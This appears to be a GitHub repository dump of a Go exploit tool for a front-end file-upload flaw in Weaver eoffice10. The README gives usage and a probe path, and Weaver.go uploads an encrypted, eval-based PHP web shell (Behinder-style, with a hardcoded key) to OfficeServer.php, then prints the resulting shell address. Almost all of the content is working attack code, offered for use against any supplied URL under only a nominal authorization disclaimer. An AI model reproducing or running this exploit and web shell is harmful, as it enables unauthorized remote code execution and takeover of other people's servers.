├── README.md
├── Weaver.go
├── exp.png
├── getshell.png
└── main.go


/README.md:
--------------------------------------------------------------------------------
 1 | # Weaver-Eoffice-getshell exp
 2 | 泛微 eoffice10 前台 getshell
 3 | 
 4 | author:160team.west9B
 5 | 
 6 | **仅限用于安全研究人员在授权的情况下使用，遵守网络安全法，产生任何问题，后果自负，与作者无关。**
 7 | 
 8 | # 01-基本介绍
 9 | 
10 | 泛微 eoffice10 前台getshell，公开日期：2022/7/28
11 | 
12 | # 02-使用说明
13 | 
14 | ## usage: ./Eoffice10getshell.exe -u url  (加http://)
15 | 
16 | exp上传冰蝎，默认密码，上传成功返回shell地址
17 | 
18 | poc：访问/eoffice10/server/public/iWebOffice2015/OfficeServer.php返回200存在漏洞，404及其他不存在。
19 | 
20 | # Screenshots
21 | ![Image text](https://github.com/west9b/Weaver-Eoffice-getshell/blob/main/exp.png)
22 | ![Image text](https://github.com/west9b/Weaver-Eoffice-getshell/blob/main/getshell.png)
23 | 
24 | 


--------------------------------------------------------------------------------
/Weaver.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"crypto/tls"
 5 | 	"fmt"
 6 | 	"io/ioutil"
 7 | 	"net/http"
 8 | 	"strings"
 9 | )
10 | 
11 | func Weaver() {
12 | 	fmt.Println("\n-----------------------✂---------------------------")
13 | 	fmt.Println("泛微 eoffice10 前台getshell 公开日期：2022/7/28")
14 | 	fmt.Println("\n-----------------------✂---------------------------")
15 | 	tr := &http.Transport{
16 | 		TLSClientConfig: &tls.Config{
17 | 			InsecureSkipVerify: true,
18 | 		},
19 | 	}
20 | 	client := &http.Client{Transport: tr}
21 | 	req, err := http.NewRequest("POST", url+Eofficepath, strings.NewReader(
22 | 		`
23 | ------WebKitFormBoundarygfpd61aYDAKQ11RF
24 | Content-Disposition: form-data; name="FileData"; filename="1.jpg"
25 | Content-Type: image/jpeg
26 | 
27 | true
28 | <?php
29 | @error_reporting(0);
30 | session_start();
31 |     $key="e45e329feb5d925b";
32 | 	$_SESSION['k']=$key;
33 | 	session_write_close();
34 | 	$post=file_get_contents("php://input");
35 | 	if(!extension_loaded('openssl'))
36 | 	{
37 | 		$t="base64_"."decode";
38 | 		$post=$t($post."");
39 | 		
40 | 		for($i=0;$i<strlen($post);$i++) {
41 |     			 $post[$i] = $post[$i]^$key[$i+1&15]; 
42 |     			}
43 | 	}
44 | 	else
45 | 	{
46 | 		$post=openssl_decrypt($post, "AES128", $key);
47 | 	}
48 |     $arr=explode('|',$post);
49 |     $func=$arr[0];
50 |     $params=$arr[1];
51 | 	class C{public function __invoke($p) {eval($p."");}}
52 |     @call_user_func(new C(),$params);
53 | ?>
54 | ------WebKitFormBoundarygfpd61aYDAKQ11RF
55 | Content-Disposition: form-data; name="FormData"
56 | 
57 | {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'ccw9b.php'}
58 | ------WebKitFormBoundarygfpd61aYDAKQ11RF--
59 | `))
60 | 	if err != nil {
61 | 	}
62 | 	req.Header.Add("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarygfpd61aYDAKQ11RF")
63 | 	req.Header.Add("Connection", "close")
64 | 	resp, err := client.Do(req)
65 | 	if err != nil {
66 | 		fmt.Println("不存在泛微 eoffice10 前台getshell漏洞")
67 | 		return
68 | 	}
69 | 	defer resp.Body.Close()
70 | 
71 | 	responseGet, err1 := http.Get(url + "/eoffice10/server/public/iWebOffice2015/Document/ccw9b.php")
72 | 	if err1 != nil {
73 | 		fmt.Println("不存在泛微 eoffice10 前台getshell漏洞")
74 | 		return
75 | 	}
76 | 	defer responseGet.Body.Close()
77 | 	s, _ := ioutil.ReadAll(responseGet.Body)
78 | 	fmt.Printf("%s", s)
79 | 	if string(s) == "true\n" {
80 | 		fmt.Println("存在泛微 eoffice10 前台getshell漏洞")
81 | 		fmt.Println("冰蝎地址:", url+"/eoffice10/server/public/iWebOffice2015/Document/ccw9b.php")
82 | 	} else {
83 | 		fmt.Println("不存在泛微 eoffice10 前台getshell漏洞")
84 | 	}
85 | 
86 | }
87 | 


--------------------------------------------------------------------------------
/exp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/west9b/Weaver-Eoffice-getshell/9ef165342c26021c80e4f74ea21c8bb0c1460237/exp.png


--------------------------------------------------------------------------------
/getshell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/west9b/Weaver-Eoffice-getshell/9ef165342c26021c80e4f74ea21c8bb0c1460237/getshell.png


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | //author:160team.west9B
 4 | import (
 5 | 	"flag"
 6 | 	"fmt"
 7 | )
 8 | 
 9 | var (
10 | 	url         string
11 | 	Eofficepath = "/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
12 | )
13 | 
14 | func init() {
15 | 	flag.StringVar(&url,
16 | 		"u",
17 | 		"null",
18 | 		"url:http://127.0.0.1/",
19 | 	)
20 | 
21 | }
22 | func main() {
23 | 	flag.Parse()
24 | 	fmt.Println("author:160team.west9b")
25 | 	if url != "null" {
26 | 		Weaver()
27 | 		return
28 | 	}
29 | 	fmt.Println("usage_poc:WeaverGetshell.exe -u url")
30 | }
31 | 


--------------------------------------------------------------------------------